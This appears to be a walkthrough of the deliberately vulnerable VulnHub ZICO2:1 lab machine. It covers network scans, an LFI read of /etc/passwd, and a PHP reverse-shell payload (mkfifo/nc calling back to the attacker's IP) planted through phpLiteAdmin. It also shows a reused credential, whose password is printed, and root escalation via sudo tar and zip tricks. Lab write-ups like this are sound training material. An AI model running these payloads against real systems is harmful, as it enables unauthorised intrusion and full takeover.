VulnHub: ZICO2: 1

Link: https://www.vulnhub.com/entry/zico2-1,210/

Initial foothold

1. Network discovery

nmap -sn 10.0.2.32/24

My target is 10.0.2.38.

2. Port scan

nmap -Pn 10.0.2.38
nmap -Pn -p1000- 10.0.2.38

There’re 4 open ports: 22, 80, 111, and 57516.

3. OS and service scan

nmap -A -p22,80,111,57516 10.0.2.38

4. Vuln scan

nmap --script vuln -p22,80,111,57516 10.0.2.38

Service Enumeration

1. SSH port 22

Initial connection

ssh 10.0.2.38

There’s no any banners.

2. HTTP port 80

Nikto scan

nikto -h http://10.0.2.38

There’re interesting directories as listed in snapshot.

Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.38/ -x php,txt,html,sh,cgi -q

Access HTTP site

Viewing page source revealed that there’s possible LFI vulnerability.

Verify it

Intercept w/ Burp Suite and send to the Repeater

Test for LFI by edit string of the request as highlighted.

../../../../../etc/passwd

Success!!!

Access other directories from scan result. I came across /dbadmin which contains phpLiteAdmin v1.9.3.

I googled it and came across this exploit guide.

Offensive Security's Exploit Database Archive

3. RPCBind port 111

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.2.38

Exploitation

1. Access test_users database. I got credentials of root and zico.

2. Crack hashes w/ crackstation.

3. Use cracked hash to login w/ ssh

ssh root@10.0.2.38
ssh zico@10.0.2.38

Failed!

4. Exploit phpLiteAdmin

I will follow exploitation guide

Create New Database as ‘hack.php’

Create new table

Supply reverse shell command using this guide

Reverse Shell Cheat Sheet

I used this command and save as TEXT

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.32 443 >/tmp/f");?>

File ‘hack.php’ will be stored in ‘/use/database/hack.php’

Prepare reverse shell listener on port 443

rlwrap nc -lvp 443

Access w/ LFI vulnerability that I discovered.

Back to the listener, I got the shell

NOTE: Before I got the shell, I tried many commands. If you don't have the shell yet, just keep trying.

Privilege Escalation

1. Import TTY shell

python -c 'import pty;pty.spawn("/bin/bash");'

2. Explore directories

cd /var/www
ls -la

Nothing useful

cd /home
ls -la
cd zico
ls -la

There’s a Wordpress directory

cd wordpress
cat wp-config.php

Now I got zico’s credential of mysql.

Some people re-use their credential. I’ll try to use them and login as zico

su zico
password: sWfCsfJSPV9H3AmQzw8

Now I’m zico. Next is verifying sudo

sudo -l

I have 2 method to escalate my privileges to root.

Starting w/ tar, I used this guide.

tar | GTFOBins

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
whoami
cd /root
ls -la
cat flag.txt

Now I’m root.

Another method is zip

zip | GTFOBins

TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
whoami

Now, I’m root.